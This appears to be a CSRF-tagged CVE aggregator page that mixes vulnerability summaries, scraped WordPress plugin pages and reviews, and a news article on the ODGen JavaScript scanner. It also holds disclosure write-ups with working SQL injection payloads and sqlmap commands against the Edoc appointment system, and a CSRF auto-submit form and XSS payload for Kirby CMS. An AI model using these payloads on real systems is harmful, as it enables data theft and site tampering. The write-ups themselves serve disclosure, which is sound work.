Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Simon Ward MP3 jPlayer plugin <= 2.7.3 at WordPress.

CVE-2022-36373: MP3-jPlayer

Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS) in CallRail, Inc. CallRail Phone Call Tracking plugin <= 0.4.9 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

CallRail is here to bring complete visibility to the marketers who rely on quality inbound leads to measure success. Our customers live in a results-driven world, and giving them a clear view into their digital marketing efforts is a first priority for CallRail. We see the opportunities in surfacing and connecting data from calls, forms, chat and beyond — helping our customers get to better outcomes.

Our WordPress plugin allows you to learn detailed information about the source and web session of every caller from your website using a process called Dynamic Number Insertion. It also powers our form tracking tool, which gives you the power to attribute form submissions back to their source and learn about what the user did on your site before submitting the form.

*   Learn more about CallRail.
*   Check out our WP plugin support documentation.

1.  Sign in to your CallRail account and click the **Settings tab**.
2.  Select the company you want from the dropdown menu.
3.  Find the WordPress plugin in the list of integrations and click **Instructions**.
4.  Download the plugin and follow the instructions listed.

Full documentation can be found here.

Constant integration issues with Adwords make our conversion data mostly useless. In Adwords this is a huge problem. They recently lost 2/3 of our all time call recordings!!!!! This data was priceless and is unrecoverable. Callrail's support is some of the worst I have encountered and even during emergency situations they are not in a hurry to help. Calls to support go unanswered and if we get a callback it is often the next day by someone who has little knowledge. We are finding a new company to work with and I would suggest others to do the same. I will update this post with a full breakdown of all our callrail issues once we have migrated to a new provider. Too many to list at the current moment 🙁

Read all 4 reviews

“CallRail Phone Call Tracking” is open source software. The following people have contributed to this plugin.

Contributors

*    apowellgt

**0.2**

*   Initial public release.

**0.3**

*   Update to version 2 of the javascript tracking script (swap.js)
*   Prompt the user to add an API key after installation.
*   Don’t insert the CallRail script if no API key is present.
*   Trim whitespace surrounding the API key before saving.

**0.3.1**

*   Update to version 3 of the javascript tracking script (swap.js)

**0.3.2**

*   Update to version 4 of the javascript tracking script (swap.js) which supports more advanced number replacement.

**0.3.3**

*   Update to version 5 of the javascript tracking script (swap.js)

**0.3.4**

*   Update to version 7 of the javascript tracking script (swap.js) and serve the script via the MaxCDN network (cdn.callrail.com).

**0.3.5**

*   Update to version 8 of the javascript tracking script (swap.js).

**0.3.6**

*   Update to version 10 of the javascript tracking script (swap.js).

**0.3.7**

*   Add a HTML comment so the CallRail support team can see when swap.js is installed via WordPress.

**0.3.8**

*   Update to version 11 of the javascript tracking script (swap.js).

**0.3.11**

*   Set Callrail cookies via HTTP using xhr request from swap.js script.

**0.4.0**

*   Added an optional feature to load required scripts as first-party through WordPress.

**0.4.1**

*   Various bug fixes.
*   Default first-party swap.js to on after testing if it is supported or not.

**0.4.2**

*   Fix bug where forms were not rendering for first-party enabled sites.

**0.4.3**

*   update the readme.

**0.4.4**

*   Change the default value for the “Enable As First Party Script” flag to false for initial Installations.

**0.4.5**

*   Add the newly required parameter “permission\_callback” to all custom REST endpoint definitions

**0.4.6**

*   Updating tested up to version.

**0.4.7**

*   Updating tested up to version. redeploy.

**0.4.8**

*   Updating tested up to version. redeploy.

**0.4.9**

*   Fixed End User IP Address detection

CVE-2022-36796: CallRail Phone Call Tracking

ODGen tool was presented at this year’s Usenix Security Symposium

ODGen tool was presented at this year’s Usenix Security Symposium

Researchers at Johns Hopkins University have developed a graph-based code analysis tool that can detect a wide range of vulnerabilities in JavaScript programs.

Called ODGen, the tool was presented at this year’s Usenix Security Symposium and addresses some of the challenges that limited the use of graph-based security tools in analyzing JavaScript programs.

The researchers proved the effectiveness of ODGen by applying it to thousands of Node.js libraries, where it discovered 180 zero-day vulnerabilities and received 70 CVEs.

**Graph-based methods**

Graph-based scanners parse source code files to build a graph structure that represents the different properties and execution branches of an application. This graph can then be used to model and find vulnerabilities in the source code.

Graph query-based approaches have proven to be very effective in detecting vulnerabilities in some programming languages. One technique in particular, Code Property Graph (CPG), has proven to be successful in securing C/C++ and PHP code.

**RECOMMENDED** Critical command injection vulnerability discovered in Bitbucket Server and Data Center

Inspired by the success of graph methods – particularly CPG – the researchers at Johns Hopkins University tried to apply them to JavaScript. While there are different tools for finding specific vulnerabilities in JavaScript code, graph-based tools promise to provide a general framework for detecting all kinds of vulnerabilities.

“JavaScript, particularly Node.js, is becoming a vital community with millions of packages these days,” Yinzhi Cao, co-author of the paper and assistant professor of computer science at Johns Hopkins University, told _The Daily Swig_.

“At the same time, many of these NPM packages are less maintained and vulnerabilities are prevalent in the NPM ecosystem. That is why we decided to perform the study to make the ecosystem a safer environment.”

However, their initial findings showed that CPG is not very effective in JavaScript due to the language’s dynamic structure, which makes it much more difficult to parse and analyze object relations and program branches prior to execution.

“CPG does not model detailed object relations including (i) prototype chains and (ii) object-level data flows. Therefore, it is hard to apply CPG to detect JavaScript-specific vulnerabilities, such as Prototype Pollution and Internal Property Tampering. And it is hard to model fine-grained object-level data flows in CPG,” Cao said.

**Object Dependence Graph**

In their paper, the researchers propose Object Dependence Graph (ODG) as a novel method to build graphs from JavaScript code. ODG uses some of the components of CPG, such as Abstract Syntax Trees (AST), and adds features that are specific to JavaScript, including fine-grained data dependency between objects. Accordingly, the researchers created ODGen, a tool for creating and querying ODGs.

“Our proposed ODGen abstractly interprets JavaScript code and generates a so-called Object Dependence Graph to capture such dynamic features including object relations so that a graph query-based approach can easily obtain such information and detect vulnerabilities,” Cao said.

Read more of the latest infosec research news

The researchers designed ODGen to detect vulnerabilities at application and package levels. They tested the tool on 330 documented vulnerabilities that spanned across 16 categories, including cross-site scripting (XSS), server- and client-side request forgery (SSRF/CSRF), SQL injection, prototype pollution, and command injection.

The tool was able to detect 13 types of vulnerabilities with very high accuracy, discovering 302 of the 330 bugs.

They expanded their test by crawling 300,000 NPM packages and applying ODGen with graph queries to detect queries. ODGen reported nearly 3,000 security bugs, of which the researchers verified 264 that belonged to libraries with more than 1,000 weekly downloads. They were able to confirm and report 180 security bugs, many of which were in libraries that are used widely in web applications. Of the discovered vulnerabilities, 70 were assigned CVEs.

ODGen shows how much more needs to be done to secure the open source JavaScript ecosystem and how the adaptation of existing tools can help in developing holistic approaches to securing Node.js libraries.

In the future, Cao said, the team might extend ODGen to other programming languages used in web applications, including PHP and Java.

**YOU MIGHT LIKE** Ethereum Foundation offers $1m bug bounty payouts with proof-of-stake migration multiplier

Graph-based JavaScript bug scanner discovers more than 100 zero-day vulnerabilities in Node.js libraries

Cross-Site Request Forgery (CSRF) in GitHub repository froxlor/froxlor prior to 0.10.38.

CVE-2022-3017

Edoc-doctor-appointment-system v1.0.1 was discovered to contain a Cross-Site Request Forgery (CSRF) via /patient/settings.php.

**Edoc-doctor-appointment-system v1.0.1 was discovered to contain multiple SQL injection vulnerabilities via /patient/doctors.php , /patient/booking.php , /patient/settings.php .Allowing remote attackers to execute the sqli attack.****1 . Blind SQLi in /patient/doctors.php**

PoC

    http://ip/patient/doctors.php?action=view&id=1' AND (SELECT 7788 FROM (SELECT(SLEEP(5)))gIPf)-- MVmI
    

vendor : https://github.com/HashenUdara/edoc-doctor-appointment-system

Vulnerability Position : http://ip/patient/doctors.php

Log in to the http://ip/login.php

Visit http://ip/patient/doctors.php , will access the page of the module.

Use burp suite to capture request packet , and then click the View button.

Copy request packet to sqlmap root path , and revise id=1\* , save as 2.txt.

Use python sqlmap.py -r 2.txt --threads 10 --batch --level 3 --risk 3 --dbms mysql --technique B --dbs to run sqlmap.

**2\. SQLi in /patient/booking.php**

PoC

    sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
    ---
    Parameter: #1* (URI)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: http://www.doctor111.com:80/patient/booking.php?id=1 AND 7686=7686
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: http://www.doctor111.com:80/patient/booking.php?id=1 OR (SELECT 3032 FROM(SELECT COUNT(*),CONCAT(0x717a6a7071,(SELECT (ELT(3032=3032,1))),0x7170787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: http://www.doctor111.com:80/patient/booking.php?id=1 AND (SELECT 8632 FROM (SELECT(SLEEP(5)))HCPI)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 13 columns
        Payload: http://www.doctor111.com:80/patient/booking.php?id=-4821 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a6a7071,0x4247754365636f69425457434250756e6877504d52795463504f436950496d726376685a64465049,0x7170787a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
    ---
    

vendor : https://github.com/HashenUdara/edoc-doctor-appointment-system

Vulnerability Position : http://ip/patient/booking.php

Log in to the http://ip/login.php

First , visit http://ip/patient/schedule.php , and then use burpsuite to capture request packet , click Book Now button.

Copy request packet to sqlmap root path , and revise id=1\* , save as 2.txt.

Use python sqlmap.py -r 2.txt --threads 10 --batch --level 3 --risk 3 --dbms mysql --dbs to run sqlmap.

**3\. SQLi in /patient/settings.php**

PoC

    sqlmap identified the following injection point(s) with a total of 177 HTTP(s) requests:
    ---
    Parameter: #1* (URI)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: http://www.doctor111.com:80/patient/settings.php?action=edit&id=1' AND 3197=(SELECT (CASE WHEN (3197=3197) THEN 3197 ELSE (SELECT 9367 UNION SELECT 1506) END))-- -&error=0
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: http://www.doctor111.com:80/patient/settings.php?action=edit&id=1' OR (SELECT 3493 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(3493=3493,1))),0x717a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ITWX&error=0
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: http://www.doctor111.com:80/patient/settings.php?action=edit&id=1' AND (SELECT 6213 FROM (SELECT(SLEEP(5)))kZmv)-- SfKb&error=0
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 8 columns
        Payload: http://www.doctor111.com:80/patient/settings.php?action=edit&id=-6866' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162786a71,0x78415242537376577872514272566a74536270524449464568776d4e5a577a57524e676b62644d57,0x717a6a7071)-- -&error=0
    ---
    

vendor : https://github.com/HashenUdara/edoc-doctor-appointment-system

Vulnerability Position : http://ip/patient/settings.php

Log in to the http://ip/login.php

First , visit http://ip/patient/settings.php , and then use burpsuite to capture request packet , click Book Now button.

Copy request packet to sqlmap root path , and revise id=1\* , save as 2.txt.

Use python sqlmap.py -r 2.txt --threads 10 --batch --level 3 --risk 3 --dbms mysql --dbs to run sqlmap.

CVE-2022-36546: cve/Multiple SQL injection.md at master · onEpAth936/cve

mm-wiki v0.2.1 was discovered to contain a Cross-Site Request Forgery (CSRF) which allows attackers to arbitrarily add user accounts and modify user information.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-39394: CSRF vulnerabilities · Issue #316 · phachon/mm-wiki

Cross-Site Request Forgery (CSRF) vulnerability in SEO Scout plugin <= 0.9.83 at WordPress allows attackers to trick users with administrative rights to unintentionally change the plugin settings.

 Verified

 Not fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Vulnerable versions

<= 0.9.83

PSID 

453afcf86c8b

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-08-25

**Details**

Cross-Site Request Forgery (CSRF) vulnerability leading to plugin settings change discovered by ptsfence (Patchstack Alliance) in WordPress SEO Scout plugin (versions <= 0.9.83).

**Solution**

Deactivate and delete. This plugin has been closed as of August 24, 2022 and is not available for download. This closure is temporary, pending a full review.

**References**

CVE-2022-36358: WordPress SEO Scout plugin <= 0.9.83 - Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Claroline 13.5.7 and prior allows an authenticated attacker to elevate privileges via the arbitrary creation of a privileged user. By combining the XSS vulnerability present in several upload forms and a javascript request to the present API, it is possible to trigger the creation of a user with administrative rights by opening an SVG file as an administrator user.

**Admin account takeover (CSRF) via XSS because of arbitrary file upload (version : 13.5.7)**

Claroline Connect is affected by a CSRF vulnerability, because of missing CSRF tokens or other protection means. This CSRF can be triggered via the Claroline's API, by combining an XSS vulnerability (like svg maybe ?) with a fetch request to the API. An arbitrary user with admin rights can be created by triggering the XSS from an admin user.

**Example of POC :**

**Fix suggest :** adding CSRF tokens or other protection way.

CVE-2022-37160: claroline-CVEs/csrf.md at main · matthieu-hackwitharts/claroline-CVEs

An issue was discovered in Kirby 2.5.12. The delete page functionality suffers from a CSRF flaw. A remote attacker can craft a malicious CSRF page and force the user to delete a page.

**Cross Site Request Forgery - Kirby CMS**

Cross Site Request Forgery - Kirby CMS  
By- Zaran Shaikh

Hi Readers,

Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.

Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Cross Site Request Forgery.  
Title of the Vulnerability:  Stored XSS  
Vulnerability Class: Web Application Exploits.

**Technical Details & Description**: The application allows malicious HTTP requests to be sent in order to trick a user into adding/ deleting web pages.

CVE ID allocated: - Undisclosed.

**Product & Service Introduction**: Kirby CMS

**Steps to Re-Produce –**  
1.       Visit the application  
2.       Go to add page option  
3.       Create a crafted HTTP page with delete/ add option and host it on a server. Upon sending the link to a user and upon click, it gets triggered and the page is added/deleted  
4\. Payload:  
<html>  
  <body>  
  <script>history.pushState('', '', '/')</script>  
    <form action="http://localhost/kirby/panel/pages/csrf-test-page/delete">  
      <input type="hidden" name="&#95;redirect" value="site&#47;subpages" />  
      <input type="submit" value="Submit request" />  
    </form>  
    <script>  
      document.forms\[0\].submit();  
    </script>  
  </body>  
</html>

**Exploitation Technique:** A attacker can inject perform severe actions including account takeover.  
**Severity Level**: High  
**Security Risk:**  
The presence of such a risk can lead to data loss,privilege escalation etc.

**Affected Product Version**:  Kirby 2.5.12  
**Solution - Fix & Patch:** The application code should be configured to implement anti csrf tokens.

POCs:

  

**Stored XSS - Kirby CMS**

By- Zaran Shaikh

Hi Readers,

Welcome to my blog. I am a inquisitive learner in the world of Cyber Security and will love to share my research and other stuff in coming time.

Since a while I have been fascinated with the concept of 0 days and started learning more on the topic. While coming across open source applications, I decided to explore Kirby CMS. I found multiple vulnerabilities in it, of which I am mentioning about Stored Cross Site Scripting

**Title of the Vulnerability**:  Stored XSS

**Vulnerability Class**: Web Application Exploits.

**Technical Details & Description**: The application allows user injected payload which can lead to Stored Cross Site Scripting.

CVE ID allocated: - Undisclosed.

Product & Service Introduction: Kirby CMS

Steps to Re-Produce –

1.       Visit the application

2.       Go to add page option

3.       Under title, enter any XSS payload like: <script>alert("XSS");</script>

4.       Upon the payload being injected, the subsequent page is triggered with XSS.

**Exploitation Technique**: A attacker can inject malicious xss payloads to steal user data.

**Severity Level**: High

**Security Risk**:

The presence of such a risk can lead to data loss, xss shell uploads etc

**Affected Product Version**:  Kirby 2.5.12

**Solution - Fix & Patch**: The application code should be configured to implement strict input validation to prevent XSS payloads.

POCs:

CVE-2018-14519: Zaran's Security Research Blog

Cross-Site Request Forgery (CSRF) leading to plugin settings update in YooMoney ?Kassa ??? WooCommerce plugin <= 2.3.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Важно**

Плагин «ЮKassa» разработан для WooCommerce 3.7 и выше.

The YooKassa plugin is compatible with WooCommerce version 3.7 or later.

**Описание**

Плагин «ЮKassa» – платежное решение для сайтов на WooCommerce:

*   включает 12 способов приема платежей,
*   подходит для юрлиц и ИП,
*   деньги поступают на банковский счет компании.

**Description**

The YooKassa plugin is the payment solution for websites that use WooCommerce:

*   includes 12 payment acceptance methods,
*   suitable for companies and entrepreneurs,
*   settlements are made to the company’s bank account.

**Настройка плагина**

Чтобы принимать платежи через плагин, нужно подать заявку на подключение ЮKassa и заключить договор с компанией «ЮMoney» (онлайн).  
После этого вы получите нужные настройки.  
Инструкция по установке и настройке плагина

**Plugin configuration**

To accept payments via the plugin, apply for onboarding with YooKassa and enter into a contract with YooMoney (online).  
We will send you the required settings afterwards.

**Поддержка передачи данных чека**  
Если вы настраивали отправку чеков в налоговую через партнеров ЮKassa (по 54-ФЗ), в настройках модуля надо включить отправку данных для чека.  
Помощь ЮKassa отправка чеков по 54-ФЗ

**We support the transmission of receipts**  
If you configured the transmission of receipts to the Tax service via YooKassa (in accordance with Federal Law No. 54-FZ), enable the transmission of receipt data in the settings.  
YooKassa’s guide for transmission of receipts in accordance with Federal Law No. 54-FZ

**Тарифы**

Подключение ЮKassa и настройка плагина – бесплатно. Комиссия за прием платежей – от 2,8%.  
Посмотреть все тарифы на сайте ЮKassa

**Rates**  
Onboarding with YooKassa and plugin configuration are free of charge. The commission for accepting payments starts at 2.8%.  
View all rates at the YooKassa website

**Все возможности ЮKassa**

После подключения ЮKassa доступны:  
\* 12 способов приема платежей. Карты, электронные кошельки, интернет-банки, сервисы онлайн-кредитования, наличные, баланс телефона. Вы сами выбираете, какие способы нужны, и перечисляете их в договоре. Кнопки оплаты можно разместить на своем сайте или на сайте ЮMoney: выберите подходящий вариант при настройке плагина.  
\* Личный кабинет на сайте ЮKassa. В нем можно делать возвраты платежей, выставлять и отправлять счета, общаться с менеджерами ЮKassa.

Перейти на сайт ЮKassa

**All features of YooKassa**

After the onboarding, you can access:

12 payment acceptance methods. Cards, e-wallets, online banking, installment plan services, cash, phone balance. Select the methods by yourself and specify them in the contract. You can place the payment buttons at your website or at the YooKassa website: choose the suitable option when setting up the plugin.  
Your own Merchant Profile at the YooKassa website. Use it to make refunds, create and send invoices, or contact the YooKassa manager.  
Visit the YooKassa website

Этот контора мошенники! Они вводят людей в заблуждение. После регистрации на юмони, вы не сможете принимать платежи. Они собирают о вас информацию и ни известно что потом с ней делают.

It is lightweight and work. Other not matter.

Read all 3 reviews

“ЮKassa для WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    yoomoney

**2.4.0**

*   Добавлен метод оплаты СБП с выбором на стороне сайта
*   Обновление SDK до версии 2.5.1

**2.3.3**

*   Исправлена ошибка повторной обработки уже полученных уведомлений от ЮKassa
*   Обновление SDK до 2.4.2

**2.3.2**

*   Добавлена возможность разрешать пользователям сохранять карту после успешной оплаты

**2.3.1**

*   Добавлена проверка роли пользователя при сохранении настроек (разрешено только administrator и manage\_woocommerce)
*   Добавлена проверка токена и сам токен в формах настроек для защиты от CSRF
*   Обновление SDK до 2.4.1

**2.3.0**

*   Добавлен способ авторизации в Юkassa через OAuth.
*   Добавлена подписка на уведомления через OAuth токен
*   Обновлен интерфейс настройки модуля
*   Добавлен перевод
*   Обновлен SDK до версии 2.3.0

**2.2.5**

*   Отключен способ оплаты Webmoney
*   Обновлен SDK до версии 2.2.6

**2.2.4**

*   Изменена инициализация виджета
*   Обновлен SDK до версии 2.2.5

**2.2.3**

*   Обновлен SDK до версии 2.2.2

**2.2.2**

*   Обновлен SDK до версии 2.1.8

**2.2.1**

*   Очистка корзины при оплате через виджет

**2.2.0**

*   Замена Сбербанк Онлайн на SberPay
*   Исправлена работа по очистке корзины
*   Добавлен файл переводов для en локали
*   Обновлен SDK до версии 2.1.7

**2.1.5**

*   Исправление конвертации стоимости товара и доставки

**2.1.4**

*   Курсы валют с учетом номинала
*   Обновлен SDK до версии 2.1.3

**2.1.3**

*   Заменён файл верификации для ApplePay

**2.1.2**

*   Поддержка сайтов без ЧПУ
*   Обновлен SDK до версии 2.1.2

**2.1.1**

*   Игнорируем заказы с другими платежными системами

**2.1.0**

*   Установка системы налогообложения
*   Исправлена ошибка пересчета кредитования при изменении способа доставки
*   Небольшие поправки
*   Обновлен SDK до версии 2.1.0

**2.0.4**

*   Поддержка плагина WPML при возврате с формы оплаты
*   Обновлен SDK до версии 2.0.7

**2.0.3**

*   Работа вкладок на странице настроек при конфликте bootstrap

**2.0.2**

*   Форматирование номера телефона для чеков
*   Обновлен SDK до версии 2.0.5

**2.0.1**

*   Сохранение всех попыток оплаты с привязкой к заказу

**2.0.0**

*   Публикация в магазине приложений

Tag

#csrf